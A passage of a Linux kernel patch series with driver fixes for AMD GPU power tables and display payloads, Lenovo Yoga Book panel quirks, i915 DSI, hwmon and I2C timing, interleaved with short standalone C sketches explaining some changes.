++			BIT(DMA_SLAVE_BUSWIDTH_4_BYTES);
+ 	dma->dst_addr_widths = BIT(DMA_SLAVE_BUSWIDTH_1_BYTE) |
+ 			BIT(DMA_SLAVE_BUSWIDTH_2_BYTES) |
+ 			BIT(DMA_SLAVE_BUSWIDTH_4_BYTES);
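
admac_terminate_all() now parks the in-flight descriptor on the channel's to-free list instead of just dropping the pointer, so the deferred cleanup still reaches it. A small list-based sketch of that hand-off (kernel list helpers replaced by a plain singly linked list):

    #include <stdlib.h>

    struct desc { struct desc *next; };

    struct chan {
        struct desc *current_tx;
        struct desc *to_free;              /* singly linked free list */
    };

    static void terminate(struct chan *ch)
    {
        if (ch->current_tx) {
            ch->current_tx->next = ch->to_free; /* keep it reachable */
            ch->to_free = ch->current_tx;
            ch->current_tx = NULL;
        }
    }

    int main(void)
    {
        struct chan ch = { .current_tx = malloc(sizeof(struct desc)) };

        terminate(&ch);
        while (ch.to_free) {               /* later teardown frees it */
            struct desc *d = ch.to_free;
            ch.to_free = d->next;
            free(d);
        }
        return ch.current_tx == NULL ? 0 : 1;
    }
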
+diff --git a/drivers/firmware/efi/sysfb_efi.c b/drivers/firmware/efi/sysfb_efi.c
+index e76d6803bdd08..456d0e5eaf78b 100644
+--- a/drivers/firmware/efi/sysfb_efi.c
++++ b/drivers/firmware/efi/sysfb_efi.c
+@@ -272,6 +272,14 @@ static const struct dmi_system_id efifb_dmi_swap_width_height[] __initconst = {
+ 					"IdeaPad Duet 3 10IGL5"),
+ 		},
+ 	},
++	{
++		/* Lenovo Yoga Book X91F / X91L */
++		.matches = {
++			DMI_EXACT_MATCH(DMI_SYS_VENDOR, "LENOVO"),
++			/* Non exact match to match F + L versions */
++			DMI_MATCH(DMI_PRODUCT_NAME, "Lenovo YB1-X91"),
++		},
++	},
+ 	{},
+ };
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_fence.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_fence.c
+index 6fdb679321d0d..3cc1929285fc0 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_fence.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_fence.c
+@@ -624,6 +624,15 @@ void amdgpu_fence_driver_clear_job_fences(struct amdgpu_ring *ring)
+ 		ptr = &ring->fence_drv.fences[i];
+ 		old = rcu_dereference_protected(*ptr, 1);
+ 		if (old && old->ops == &amdgpu_job_fence_ops) {
++			struct amdgpu_job *job;
++
++			/* For non-scheduler bad job, i.e. failed ib test, we need to signal
++			 * it right here or we won't be able to track them in fence_drv
++			 * and they will remain unsignaled during sa_bo free.
++			 */
++			job = container_of(old, struct amdgpu_job, hw_fence);
++			if (!job->base.s_fence && !dma_fence_is_signaled(old))
++				dma_fence_signal(old);
+ 			RCU_INIT_POINTER(*ptr, NULL);
+ 			dma_fence_put(old);
+ 		}
+diff --git a/drivers/gpu/drm/amd/amdgpu/gfx_v11_0.c b/drivers/gpu/drm/amd/amdgpu/gfx_v11_0.c
+index 90e739d9aeee7..0dd2fe4f071e8 100644
+--- a/drivers/gpu/drm/amd/amdgpu/gfx_v11_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/gfx_v11_0.c
+@@ -1316,6 +1316,11 @@ static int gfx_v11_0_sw_init(void *handle)
+ 		break;
+ 	}
+ 
++	/* Enable CG flag in one VF mode for enabling RLC safe mode enter/exit */
++	if (adev->ip_versions[GC_HWIP][0] == IP_VERSION(11, 0, 3) &&
++		amdgpu_sriov_is_pp_one_vf(adev))
++		adev->cg_flags = AMD_CG_SUPPORT_GFX_CGCG;
++
+ 	/* EOP Event */
+ 	r = amdgpu_irq_add_id(adev, SOC21_IH_CLIENTID_GRBM_CP,
+ 			      GFX_11_0_0__SRCID__CP_EOP_INTERRUPT,
+@@ -4625,6 +4630,14 @@ static bool gfx_v11_0_check_soft_reset(void *handle)
+ 	return false;
+ }
+ 
++static int gfx_v11_0_post_soft_reset(void *handle)
++{
++	/**
++	 * GFX soft reset will impact MES, need resume MES when do GFX soft reset
++	 */
++	return amdgpu_mes_resume((struct amdgpu_device *)handle);
++}
++
+ static uint64_t gfx_v11_0_get_gpu_clock_counter(struct amdgpu_device *adev)
+ {
+ 	uint64_t clock;
+@@ -6068,6 +6081,7 @@ static const struct amd_ip_funcs gfx_v11_0_ip_funcs = {
+ 	.wait_for_idle = gfx_v11_0_wait_for_idle,
+ 	.soft_reset = gfx_v11_0_soft_reset,
+ 	.check_soft_reset = gfx_v11_0_check_soft_reset,
++	.post_soft_reset = gfx_v11_0_post_soft_reset,
+ 	.set_clockgating_state = gfx_v11_0_set_clockgating_state,
+ 	.set_powergating_state = gfx_v11_0_set_powergating_state,
+ 	.get_clockgating_state = gfx_v11_0_get_clockgating_state,
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_helpers.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_helpers.c
+index 6bd7e45370141..0329e548134b2 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_helpers.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_helpers.c
+@@ -175,6 +175,40 @@ void dm_helpers_dp_update_branch_info(
+ 	const struct dc_link *link)
+ {}
+ 
++static void dm_helpers_construct_old_payload(
++			struct dc_link *link,
++			int pbn_per_slot,
++			struct drm_dp_mst_atomic_payload *new_payload,
++			struct drm_dp_mst_atomic_payload *old_payload)
++{
++	struct link_mst_stream_allocation_table current_link_table =
++									link->mst_stream_alloc_table;
++	struct link_mst_stream_allocation *dc_alloc;
++	int i;
++
++	*old_payload = *new_payload;
++
++	/* Set correct time_slots/PBN of old payload.
++	 * other fields (delete & dsc_enabled) in
++	 * struct drm_dp_mst_atomic_payload are don't care fields
++	 * while calling drm_dp_remove_payload()
++	 */
++	for (i = 0; i < current_link_table.stream_count; i++) {
++		dc_alloc =
++			&current_link_table.stream_allocations[i];
++
++		if (dc_alloc->vcp_id == new_payload->vcpi) {
++			old_payload->time_slots = dc_alloc->slot_count;
++			old_payload->pbn = dc_alloc->slot_count * pbn_per_slot;
++			break;
++		}
++	}
++
++	/* make sure there is an old payload*/
++	ASSERT(i != current_link_table.stream_count);
++
++}
++
+ /*
+  * Writes payload allocation table in immediate downstream device.
+  */
+@@ -186,7 +220,7 @@ bool dm_helpers_dp_mst_write_payload_allocation_table(
+ {
+ 	struct amdgpu_dm_connector *aconnector;
+ 	struct drm_dp_mst_topology_state *mst_state;
+-	struct drm_dp_mst_atomic_payload *payload;
++	struct drm_dp_mst_atomic_payload *target_payload, *new_payload, old_payload;
+ 	struct drm_dp_mst_topology_mgr *mst_mgr;
+ 
+ 	aconnector = (struct amdgpu_dm_connector *)stream->dm_stream_context;
+@@ -202,17 +236,26 @@ bool dm_helpers_dp_mst_write_payload_allocation_table(
+ 	mst_state = to_drm_dp_mst_topology_state(mst_mgr->base.state);
+ 
+ 	/* It's OK for this to fail */
+-	payload = drm_atomic_get_mst_payload_state(mst_state, aconnector->port);
+-	if (enable)
+-		drm_dp_add_payload_part1(mst_mgr, mst_state, payload);
+-	else
+-		drm_dp_remove_payload(mst_mgr, mst_state, payload, payload);
++	new_payload = drm_atomic_get_mst_payload_state(mst_state, aconnector->port);
++
++	if (enable) {
++		target_payload = new_payload;
++
++		drm_dp_add_payload_part1(mst_mgr, mst_state, new_payload);
++	} else {
++		/* construct old payload by VCPI*/
++		dm_helpers_construct_old_payload(stream->link, mst_state->pbn_div,
++						new_payload, &old_payload);
++		target_payload = &old_payload;
++
++		drm_dp_remove_payload(mst_mgr, mst_state, &old_payload, new_payload);
++	}
+ 
+ 	/* mst_mgr->->payloads are VC payload notify MST branch using DPCD or
+ 	 * AUX message. The sequence is slot 1-63 allocated sequence for each
+ 	 * stream. AMD ASIC stream slot allocation should follow the same
+ 	 * sequence. copy DRM MST allocation to dc */
+-	fill_dc_mst_payload_table_from_drm(stream->link, enable, payload, proposed_table);
++	fill_dc_mst_payload_table_from_drm(stream->link, enable, target_payload, proposed_table);
+ 
+ 	return true;
+ }
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_7_ppt.c b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_7_ppt.c
+index 5dfeab7b999b8..ea4ec937f52e5 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_7_ppt.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_7_ppt.c
+@@ -575,6 +575,14 @@ static int smu_v13_0_7_set_default_dpm_table(struct smu_context *smu)
+ 						     dpm_table);
+ 		if (ret)
+ 			return ret;
++
++		if (skutable->DriverReportedClocks.GameClockAc &&
++			(dpm_table->dpm_levels[dpm_table->count - 1].value >
++			skutable->DriverReportedClocks.GameClockAc)) {
++			dpm_table->dpm_levels[dpm_table->count - 1].value =
++				skutable->DriverReportedClocks.GameClockAc;
++			dpm_table->max = skutable->DriverReportedClocks.GameClockAc;
++		}
+ 	} else {
+ 		dpm_table->count = 1;
+ 		dpm_table->dpm_levels[0].value = smu->smu_table.boot_values.gfxclk / 100;
+@@ -828,6 +836,57 @@ static int smu_v13_0_7_get_smu_metrics_data(struct smu_context *smu,
+ 	return ret;
+ }
+ 
++static int smu_v13_0_7_get_dpm_ultimate_freq(struct smu_context *smu,
++					     enum smu_clk_type clk_type,
++					     uint32_t *min,
++					     uint32_t *max)
++{
++	struct smu_13_0_dpm_context *dpm_context =
++		smu->smu_dpm.dpm_context;
++	struct smu_13_0_dpm_table *dpm_table;
++
++	switch (clk_type) {
++	case SMU_MCLK:
++	case SMU_UCLK:
++		/* uclk dpm table */
++		dpm_table = &dpm_context->dpm_tables.uclk_table;
++		break;
++	case SMU_GFXCLK:
++	case SMU_SCLK:
++		/* gfxclk dpm table */
++		dpm_table = &dpm_context->dpm_tables.gfx_table;
++		break;
++	case SMU_SOCCLK:
++		/* socclk dpm table */
++		dpm_table = &dpm_context->dpm_tables.soc_table;
++		break;
++	case SMU_FCLK:
++		/* fclk dpm table */
++		dpm_table = &dpm_context->dpm_tables.fclk_table;
++		break;
++	case SMU_VCLK:
++	case SMU_VCLK1:
++		/* vclk dpm table */
++		dpm_table = &dpm_context->dpm_tables.vclk_table;
++		break;
++	case SMU_DCLK:
++	case SMU_DCLK1:
++		/* dclk dpm table */
++		dpm_table = &dpm_context->dpm_tables.dclk_table;
++		break;
++	default:
++		dev_err(smu->adev->dev, "Unsupported clock type!\n");
++		return -EINVAL;
++	}
++
++	if (min)
++		*min = dpm_table->min;
++	if (max)
++		*max = dpm_table->max;
++
++	return 0;
++}
++
+ static int smu_v13_0_7_read_sensor(struct smu_context *smu,
+ 				   enum amd_pp_sensors sensor,
+ 				   void *data,
+@@ -1328,9 +1387,17 @@ static int smu_v13_0_7_populate_umd_state_clk(struct smu_context *smu)
+ 				&dpm_context->dpm_tables.fclk_table;
+ 	struct smu_umd_pstate_table *pstate_table =
+ 				&smu->pstate_table;
++	struct smu_table_context *table_context = &smu->smu_table;
++	PPTable_t *pptable = table_context->driver_pptable;
++	DriverReportedClocks_t driver_clocks =
++		pptable->SkuTable.DriverReportedClocks;
+ 
+ 	pstate_table->gfxclk_pstate.min = gfx_table->min;
+-	pstate_table->gfxclk_pstate.peak = gfx_table->max;
++	if (driver_clocks.GameClockAc &&
++		(driver_clocks.GameClockAc < gfx_table->max))
++		pstate_table->gfxclk_pstate.peak = driver_clocks.GameClockAc;
++	else
++		pstate_table->gfxclk_pstate.peak = gfx_table->max;
+ 
+ 	pstate_table->uclk_pstate.min = mem_table->min;
+ 	pstate_table->uclk_pstate.peak = mem_table->max;
+@@ -1347,12 +1414,12 @@ static int smu_v13_0_7_populate_umd_state_clk(struct smu_context *smu)
+ 	pstate_table->fclk_pstate.min = fclk_table->min;
+ 	pstate_table->fclk_pstate.peak = fclk_table->max;
+ 
+-	/*
+-	 * For now, just use the mininum clock frequency.
+-	 * TODO: update them when the real pstate settings available
+-	 */
+-	pstate_table->gfxclk_pstate.standard = gfx_table->min;
+-	pstate_table->uclk_pstate.standard = mem_table->min;
++	if (driver_clocks.BaseClockAc &&
++		driver_clocks.BaseClockAc < gfx_table->max)
++		pstate_table->gfxclk_pstate.standard = driver_clocks.BaseClockAc;
++	else
++		pstate_table->gfxclk_pstate.standard = gfx_table->max;
++	pstate_table->uclk_pstate.standard = mem_table->max;
+ 	pstate_table->socclk_pstate.standard = soc_table->min;
+ 	pstate_table->vclk_pstate.standard = vclk_table->min;
+ 	pstate_table->dclk_pstate.standard = dclk_table->min;
+@@ -1675,7 +1742,7 @@ static const struct pptable_funcs smu_v13_0_7_ppt_funcs = {
+ 	.dpm_set_jpeg_enable = smu_v13_0_set_jpeg_enable,
+ 	.init_pptable_microcode = smu_v13_0_init_pptable_microcode,
+ 	.populate_umd_state_clk = smu_v13_0_7_populate_umd_state_clk,
+-	.get_dpm_ultimate_freq = smu_v13_0_get_dpm_ultimate_freq,
++	.get_dpm_ultimate_freq = smu_v13_0_7_get_dpm_ultimate_freq,
+ 	.get_vbios_bootup_values = smu_v13_0_get_vbios_bootup_values,
+ 	.read_sensor = smu_v13_0_7_read_sensor,
+ 	.feature_is_enabled = smu_cmn_feature_is_enabled,
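[Standalone illustration, not part of the patch] The smu_v13_0_7 hunks above clamp both the top DPM level and the table maximum to DriverReportedClocks.GameClockAc when the pptable reports one. A minimal sketch of that clamp, with illustrative clock values rather than real driver data:

    #include <stdio.h>

    struct dpm_table { unsigned levels[3]; unsigned count, max; };

    /* Mirror of the added logic: if an AC game clock is reported, the
     * highest DPM level (and the table max) must not exceed it. */
    static void clamp_to_game_clock(struct dpm_table *t, unsigned game_clock_ac)
    {
        if (game_clock_ac && t->levels[t->count - 1] > game_clock_ac) {
            t->levels[t->count - 1] = game_clock_ac;
            t->max = game_clock_ac;
        }
    }

    int main(void)
    {
        struct dpm_table t = { { 500, 1800, 2600 }, 3, 2600 };

        clamp_to_game_clock(&t, 2500);
        printf("top level %u, max %u\n", t.levels[2], t.max); /* 2500 2500 */
        return 0;
    }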
+diff --git a/drivers/gpu/drm/armada/armada_drv.c b/drivers/gpu/drm/armada/armada_drv.c
+index 0643887800b4d..142668cd6d7cd 100644
+--- a/drivers/gpu/drm/armada/armada_drv.c
++++ b/drivers/gpu/drm/armada/armada_drv.c
+@@ -99,7 +99,6 @@ static int armada_drm_bind(struct device *dev)
+ 	if (ret) {
+ 		dev_err(dev, "[" DRM_NAME ":%s] can't kick out simple-fb: %d\n",
+ 			__func__, ret);
+-		kfree(priv);
+ 		return ret;
+ 	}
+ 
+diff --git a/drivers/gpu/drm/drm_panel_orientation_quirks.c b/drivers/gpu/drm/drm_panel_orientation_quirks.c
+index 5522d610c5cfd..b1a38e6ce2f8f 100644
+--- a/drivers/gpu/drm/drm_panel_orientation_quirks.c
++++ b/drivers/gpu/drm/drm_panel_orientation_quirks.c
+@@ -328,10 +328,17 @@ static const struct dmi_system_id orientation_data[] = {
+ 		  DMI_EXACT_MATCH(DMI_PRODUCT_VERSION, "IdeaPad Duet 3 10IGL5"),
+ 		},
+ 		.driver_data = (void *)&lcd1200x1920_rightside_up,
+-	}, {	/* Lenovo Yoga Book X90F / X91F / X91L */
++	}, {	/* Lenovo Yoga Book X90F / X90L */
+ 		.matches = {
+-		  /* Non exact match to match all versions */
+-		  DMI_MATCH(DMI_PRODUCT_NAME, "Lenovo YB1-X9"),
++		  DMI_EXACT_MATCH(DMI_SYS_VENDOR, "Intel Corporation"),
++		  DMI_EXACT_MATCH(DMI_PRODUCT_NAME, "CHERRYVIEW D1 PLATFORM"),
++		  DMI_EXACT_MATCH(DMI_PRODUCT_VERSION, "YETI-11"),
++		},
++		.driver_data = (void *)&lcd1200x1920_rightside_up,
++	}, {	/* Lenovo Yoga Book X91F / X91L */
++		.matches = {
++		  /* Non exact match to match F + L versions */
++		  DMI_MATCH(DMI_PRODUCT_NAME, "Lenovo YB1-X91"),
+ 		},
+ 		.driver_data = (void *)&lcd1200x1920_rightside_up,
+ 	}, {	/* Lenovo Yoga Tablet 2 830F / 830L */
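[Standalone illustration, not part of the patch] The quirk-table change above works because DMI_MATCH is a prefix match while DMI_EXACT_MATCH compares whole strings: the X90 needs exact board strings, and narrowing the prefix to "Lenovo YB1-X91" still matches both F and L variants. A sketch of the two matching modes — the struct and helper here are simplified stand-ins, not the kernel's DMI API:

    #include <stdio.h>
    #include <string.h>

    struct quirk {
        const char *vendor;   /* exact match, or NULL to ignore */
        const char *product;  /* prefix match, or NULL to ignore */
        const char *desc;
    };

    static int field_prefix_match(const char *want, const char *got)
    {
        return !want || !strncmp(got, want, strlen(want));
    }

    int main(void)
    {
        const struct quirk quirks[] = {
            { "Intel Corporation", "CHERRYVIEW D1 PLATFORM", "Yoga Book X90" },
            { NULL, "Lenovo YB1-X91", "Yoga Book X91" },
        };
        const char *sys_vendor = "LENOVO";
        const char *product = "Lenovo YB1-X91F";

        for (size_t i = 0; i < sizeof(quirks) / sizeof(quirks[0]); i++) {
            const struct quirk *q = &quirks[i];
            if ((!q->vendor || !strcmp(sys_vendor, q->vendor)) &&
                field_prefix_match(q->product, product)) {
                printf("matched quirk: %s\n", q->desc);
                return 0;
            }
        }
        printf("no quirk matched\n");
        return 0;
    }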
+diff --git a/drivers/gpu/drm/i915/display/icl_dsi.c b/drivers/gpu/drm/i915/display/icl_dsi.c
+index ecd6c5c3f4ded..dd64b93c78e55 100644
+--- a/drivers/gpu/drm/i915/display/icl_dsi.c
++++ b/drivers/gpu/drm/i915/display/icl_dsi.c
+@@ -299,9 +299,21 @@ static void configure_dual_link_mode(struct intel_encoder *encoder,
+ {
+ 	struct drm_i915_private *dev_priv = to_i915(encoder->base.dev);
+ 	struct intel_dsi *intel_dsi = enc_to_intel_dsi(encoder);
++	i915_reg_t dss_ctl1_reg, dss_ctl2_reg;
+ 	u32 dss_ctl1;
+ 
+-	dss_ctl1 = intel_de_read(dev_priv, DSS_CTL1);
++	/* FIXME: Move all DSS handling to intel_vdsc.c */
++	if (DISPLAY_VER(dev_priv) >= 12) {
++		struct intel_crtc *crtc = to_intel_crtc(pipe_config->uapi.crtc);
++
++		dss_ctl1_reg = ICL_PIPE_DSS_CTL1(crtc->pipe);
++		dss_ctl2_reg = ICL_PIPE_DSS_CTL2(crtc->pipe);
++	} else {
++		dss_ctl1_reg = DSS_CTL1;
++		dss_ctl2_reg = DSS_CTL2;
++	}
++
++	dss_ctl1 = intel_de_read(dev_priv, dss_ctl1_reg);
+ 	dss_ctl1 |= SPLITTER_ENABLE;
+ 	dss_ctl1 &= ~OVERLAP_PIXELS_MASK;
+ 	dss_ctl1 |= OVERLAP_PIXELS(intel_dsi->pixel_overlap);
+@@ -322,16 +334,16 @@ static void configure_dual_link_mode(struct intel_encoder *encoder,
+ 
+ 		dss_ctl1 &= ~LEFT_DL_BUF_TARGET_DEPTH_MASK;
+ 		dss_ctl1 |= LEFT_DL_BUF_TARGET_DEPTH(dl_buffer_depth);
+-		dss_ctl2 = intel_de_read(dev_priv, DSS_CTL2);
++		dss_ctl2 = intel_de_read(dev_priv, dss_ctl2_reg);
+ 		dss_ctl2 &= ~RIGHT_DL_BUF_TARGET_DEPTH_MASK;
+ 		dss_ctl2 |= RIGHT_DL_BUF_TARGET_DEPTH(dl_buffer_depth);
+-		intel_de_write(dev_priv, DSS_CTL2, dss_ctl2);
++		intel_de_write(dev_priv, dss_ctl2_reg, dss_ctl2);
+ 	} else {
+ 		/* Interleave */
+ 		dss_ctl1 |= DUAL_LINK_MODE_INTERLEAVE;
+ 	}
+ 
+-	intel_de_write(dev_priv, DSS_CTL1, dss_ctl1);
++	intel_de_write(dev_priv, dss_ctl1_reg, dss_ctl1);
+ }
+ 
+ /* aka DSI 8X clock */
+diff --git a/drivers/hid/intel-ish-hid/ishtp/bus.c b/drivers/hid/intel-ish-hid/ishtp/bus.c
+index f68aba8794fe5..d4296681cf720 100644
+--- a/drivers/hid/intel-ish-hid/ishtp/bus.c
++++ b/drivers/hid/intel-ish-hid/ishtp/bus.c
+@@ -241,8 +241,8 @@ static int ishtp_cl_bus_match(struct device *dev, struct device_driver *drv)
+ 	struct ishtp_cl_device *device = to_ishtp_cl_device(dev);
+ 	struct ishtp_cl_driver *driver = to_ishtp_cl_driver(drv);
+ 
+-	return guid_equal(&driver->id[0].guid,
+-			  &device->fw_client->props.protocol_name);
++	return(device->fw_client ? guid_equal(&driver->id[0].guid,
++	       &device->fw_client->props.protocol_name) : 0);
+ }
+ 
+ /**
+diff --git a/drivers/hwmon/peci/cputemp.c b/drivers/hwmon/peci/cputemp.c
+index 30850a479f61f..87d56f0fc888c 100644
+--- a/drivers/hwmon/peci/cputemp.c
++++ b/drivers/hwmon/peci/cputemp.c
+@@ -537,6 +537,12 @@ static const struct cpu_info cpu_hsx = {
+ 	.thermal_margin_to_millidegree = &dts_eight_dot_eight_to_millidegree,
+ };
+ 
++static const struct cpu_info cpu_skx = {
++	.reg		= &resolved_cores_reg_hsx,
++	.min_peci_revision = 0x33,
++	.thermal_margin_to_millidegree = &dts_ten_dot_six_to_millidegree,
++};
++
+ static const struct cpu_info cpu_icx = {
+ 	.reg		= &resolved_cores_reg_icx,
+ 	.min_peci_revision = 0x40,
+@@ -558,7 +564,7 @@ static const struct auxiliary_device_id peci_cputemp_ids[] = {
+ 	},
+ 	{
+ 		.name = "peci_cpu.cputemp.skx",
+-		.driver_data = (kernel_ulong_t)&cpu_hsx,
++		.driver_data = (kernel_ulong_t)&cpu_skx,
+ 	},
+ 	{
+ 		.name = "peci_cpu.cputemp.icx",
+diff --git a/drivers/hwmon/xgene-hwmon.c b/drivers/hwmon/xgene-hwmon.c
+index d1abea49f01be..78d9f52e2a719 100644
+--- a/drivers/hwmon/xgene-hwmon.c
++++ b/drivers/hwmon/xgene-hwmon.c
+@@ -698,14 +698,14 @@ static int xgene_hwmon_probe(struct platform_device *pdev)
+ 		ctx->comm_base_addr = pcc_chan->shmem_base_addr;
+ 		if (ctx->comm_base_addr) {
+ 			if (version == XGENE_HWMON_V2)
+-				ctx->pcc_comm_addr = (void __force *)ioremap(
+-							ctx->comm_base_addr,
+-							pcc_chan->shmem_size);
++				ctx->pcc_comm_addr = (void __force *)devm_ioremap(&pdev->dev,
++								  ctx->comm_base_addr,
++								  pcc_chan->shmem_size);
+ 			else
+-				ctx->pcc_comm_addr = memremap(
+-							ctx->comm_base_addr,
+-							pcc_chan->shmem_size,
+-							MEMREMAP_WB);
++				ctx->pcc_comm_addr = devm_memremap(&pdev->dev,
++								   ctx->comm_base_addr,
++								   pcc_chan->shmem_size,
++								   MEMREMAP_WB);
+ 		} else {
+ 			dev_err(&pdev->dev, "Failed to get PCC comm region\n");
+ 			rc = -ENODEV;
+diff --git a/drivers/i2c/busses/i2c-hisi.c b/drivers/i2c/busses/i2c-hisi.c
+index d30071f299879..8a61bee745a16 100644
+--- a/drivers/i2c/busses/i2c-hisi.c
++++ b/drivers/i2c/busses/i2c-hisi.c
+@@ -314,6 +314,13 @@ static void hisi_i2c_xfer_msg(struct hisi_i2c_controller *ctlr)
+ 		    max_write == 0)
+ 			break;
+ 	}
++
++	/*
++	 * Disable the TX_EMPTY interrupt after finishing all the messages to
++	 * avoid overwhelming the CPU.
++	 */
++	if (ctlr->msg_tx_idx == ctlr->msg_num)
++		hisi_i2c_disable_int(ctlr, HISI_I2C_INT_TX_EMPTY);
+ }
+ 
+ static irqreturn_t hisi_i2c_irq(int irq, void *context)
+diff --git a/drivers/i2c/busses/i2c-imx-lpi2c.c b/drivers/i2c/busses/i2c-imx-lpi2c.c
+index 9b2f9544c5681..a49b14d52a986 100644
+--- a/drivers/i2c/busses/i2c-imx-lpi2c.c
++++ b/drivers/i2c/busses/i2c-imx-lpi2c.c
+@@ -463,6 +463,8 @@ static int lpi2c_imx_xfer(struct i2c_adapter *adapter,
+ 		if (num == 1 && msgs[0].len == 0)
+ 			goto stop;
+ 
++		lpi2c_imx->rx_buf = NULL;
++		lpi2c_imx->tx_buf = NULL;
+ 		lpi2c_imx->delivered = 0;
+ 		lpi2c_imx->msglen = msgs[i].len;
+ 		init_completion(&lpi2c_imx->complete);
+diff --git a/drivers/i2c/busses/i2c-mchp-pci1xxxx.c b/drivers/i2c/busses/i2c-mchp-pci1xxxx.c
+index 09af759211478..b21ffd6df9276 100644
+--- a/drivers/i2c/busses/i2c-mchp-pci1xxxx.c
++++ b/drivers/i2c/busses/i2c-mchp-pci1xxxx.c
+@@ -48,9 +48,9 @@
+  * SR_HOLD_TIME_XK_TICKS field will indicate the number of ticks of the
+  * baud clock required to program 'Hold Time' at X KHz.
+  */
+-#define SR_HOLD_TIME_100K_TICKS	133
+-#define SR_HOLD_TIME_400K_TICKS	20
+-#define SR_HOLD_TIME_1000K_TICKS	11
++#define SR_HOLD_TIME_100K_TICKS		150
++#define SR_HOLD_TIME_400K_TICKS		20
++#define SR_HOLD_TIME_1000K_TICKS	12
+ 
+ #define SMB_CORE_COMPLETION_REG_OFF3	(SMBUS_MAST_CORE_ADDR_BASE + 0x23)
+ 
+@@ -65,17 +65,17 @@
+  * the baud clock required to program 'fair idle delay' at X KHz. Fair idle
+  * delay establishes the MCTP T(IDLE_DELAY) period.
+  */
+-#define FAIR_BUS_IDLE_MIN_100K_TICKS		969
+-#define FAIR_BUS_IDLE_MIN_400K_TICKS		157
+-#define FAIR_BUS_IDLE_MIN_1000K_TICKS		157
++#define FAIR_BUS_IDLE_MIN_100K_TICKS		992
++#define FAIR_BUS_IDLE_MIN_400K_TICKS		500
++#define FAIR_BUS_IDLE_MIN_1000K_TICKS		500
+ 
+ /*
+  * FAIR_IDLE_DELAY_XK_TICKS field will indicate the number of ticks of the
+  * baud clock required to satisfy the fairness protocol at X KHz.
+  */
+-#define FAIR_IDLE_DELAY_100K_TICKS	1000
+-#define FAIR_IDLE_DELAY_400K_TICKS	500
+-#define FAIR_IDLE_DELAY_1000K_TICKS	500
++#define FAIR_IDLE_DELAY_100K_TICKS	963
++#define FAIR_IDLE_DELAY_400K_TICKS	156
++#define FAIR_IDLE_DELAY_1000K_TICKS	156
+ 
+ #define SMB_IDLE_SCALING_100K		\
+ 	((FAIR_IDLE_DELAY_100K_TICKS << 16) | FAIR_BUS_IDLE_MIN_100K_TICKS)
+@@ -105,7 +105,7 @@
+  */
+ #define BUS_CLK_100K_LOW_PERIOD_TICKS		156
+ #define BUS_CLK_400K_LOW_PERIOD_TICKS		41
+-#define BUS_CLK_1000K_LOW_PERIOD_TICKS	15
++#define BUS_CLK_1000K_LOW_PERIOD_TICKS		15
+ 
+ /*
+  * BUS_CLK_XK_HIGH_PERIOD_TICKS field defines the number of I2C Baud Clock
+@@ -131,7 +131,7 @@
+  */
+ #define CLK_SYNC_100K			4
+ #define CLK_SYNC_400K			4
+-#define CLK_SYNC_1000K		4
++#define CLK_SYNC_1000K			4
+ 
+ #define SMB_CORE_DATA_TIMING_REG_OFF	(SMBUS_MAST_CORE_ADDR_BASE + 0x40)
+ 
+@@ -142,25 +142,25 @@
+  * determines the SCLK hold time following SDAT driven low during the first
+  * START bit in a transfer.
+  */
+-#define FIRST_START_HOLD_100K_TICKS	22
+-#define FIRST_START_HOLD_400K_TICKS	16
+-#define FIRST_START_HOLD_1000K_TICKS	6
++#define FIRST_START_HOLD_100K_TICKS	23
++#define FIRST_START_HOLD_400K_TICKS	8
++#define FIRST_START_HOLD_1000K_TICKS	12
+ 
+ /*
+  * STOP_SETUP_XK_TICKS will indicate the number of ticks of the baud clock
+  * required to program 'STOP_SETUP' timer at X KHz. This timer determines the
+  * SDAT setup time from the rising edge of SCLK for a STOP condition.
+  */
+-#define STOP_SETUP_100K_TICKS		157
++#define STOP_SETUP_100K_TICKS		150
+ #define STOP_SETUP_400K_TICKS		20
+-#define STOP_SETUP_1000K_TICKS	12
++#define STOP_SETUP_1000K_TICKS		12
+ 
+ /*
+  * RESTART_SETUP_XK_TICKS will indicate the number of ticks of the baud clock
+  * required to program 'RESTART_SETUP' timer at X KHz. This timer determines the
+  * SDAT setup time from the rising edge of SCLK for a repeated START condition.
+  */
+-#define RESTART_SETUP_100K_TICKS	157
++#define RESTART_SETUP_100K_TICKS	156
+ #define RESTART_SETUP_400K_TICKS	20
+ #define RESTART_SETUP_1000K_TICKS	12
+ 
+@@ -169,7 +169,7 @@
+  * required to program 'DATA_HOLD' timer at X KHz. This timer determines the
+  * SDAT hold time following SCLK driven low.
+  */
+-#define DATA_HOLD_100K_TICKS		2
++#define DATA_HOLD_100K_TICKS		12
+ #define DATA_HOLD_400K_TICKS		2
+ #define DATA_HOLD_1000K_TICKS		2
+ 
+@@ -190,35 +190,35 @@
+  * Bus Idle Minimum time = BUS_IDLE_MIN[7:0] x Baud_Clock_Period x
+  * (BUS_IDLE_MIN_XK_TICKS[7] ? 4,1)
+  */
+-#define BUS_IDLE_MIN_100K_TICKS		167UL
+-#define BUS_IDLE_MIN_400K_TICKS		139UL
+-#define BUS_IDLE_MIN_1000K_TICKS		133UL
++#define BUS_IDLE_MIN_100K_TICKS		36UL
++#define BUS_IDLE_MIN_400K_TICKS		10UL
++#define BUS_IDLE_MIN_1000K_TICKS	4UL
+ 
+ /*
+  * CTRL_CUM_TIME_OUT_XK_TICKS defines SMBus Controller Cumulative Time-Out.
+  * SMBus Controller Cumulative Time-Out duration =
+  * CTRL_CUM_TIME_OUT_XK_TICKS[7:0] x Baud_Clock_Period x 2048
+  */
+-#define CTRL_CUM_TIME_OUT_100K_TICKS		159
+-#define CTRL_CUM_TIME_OUT_400K_TICKS		159
+-#define CTRL_CUM_TIME_OUT_1000K_TICKS		159
++#define CTRL_CUM_TIME_OUT_100K_TICKS		76
